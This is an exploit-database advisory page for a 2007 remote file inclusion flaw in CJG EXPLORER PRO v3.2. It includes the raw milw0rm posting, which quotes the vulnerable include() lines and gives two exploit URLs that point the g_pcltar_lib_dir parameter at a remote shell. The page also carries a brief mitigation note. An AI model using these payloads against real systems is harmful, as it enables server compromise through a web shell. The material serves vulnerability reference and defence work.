header-logo
Suggest Exploit
vendor:
CJG EXPLORER PRO
by:
Mogatil
5.5
CVSS
MEDIUM
Remote File Include
98
CWE
Product Name: CJG EXPLORER PRO
Affected Version From: CJG EXPLORER PRO v3.2
Affected Version To: CJG EXPLORER PRO v3.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

CJG EXPLORER PRO v3.2 Remote File Include Vulnerabilities

The CJG EXPLORER PRO v3.2 script is vulnerable to remote file inclusion. This vulnerability allows an attacker to include arbitrary files from a remote server.

Mitigation:

To mitigate this vulnerability, the developer should validate and sanitize user input before including files. The use of a whitelist approach is recommended.
Source

Exploit-DB raw data:

#######################S==A==U==D==I#########################

CJG EXPLORER PRO v3.2 (pcltar.lib.php)(pcltrace.lib.php) Remote File
Include Vulnerabilities

##############################################################

Found By : Mogatil , jjl@hotmail.com

##############################################################

Script Site :
http://www.zascom.com/download/PHP/1868-CEP-PHP.ZIP
##############################################################
File : /pcltar.lib.php
include($g_pcltar_lib_dir."/pclerror.lib.php");

File : /pcltrace.lib.php
include($g_pcltar_lib_dir."/pclerror.lib.php");



##############################################################

Thanx: [cold zero] [gawey Al Azary] [crazy man] [scorbion_22]
[the_muslim_sniper]

##############################################################

Exploit :[Path]cep/lib/pcltar.lib.php?g_pcltar_lib_dir=shell

Exploit :[Path]cep/lib/pcltrace.lib.php?g_pcltar_lib_dir=shell

##############################################################

# milw0rm.com [2007-05-13]

Navigation

Suggest Exploit

Services By CQR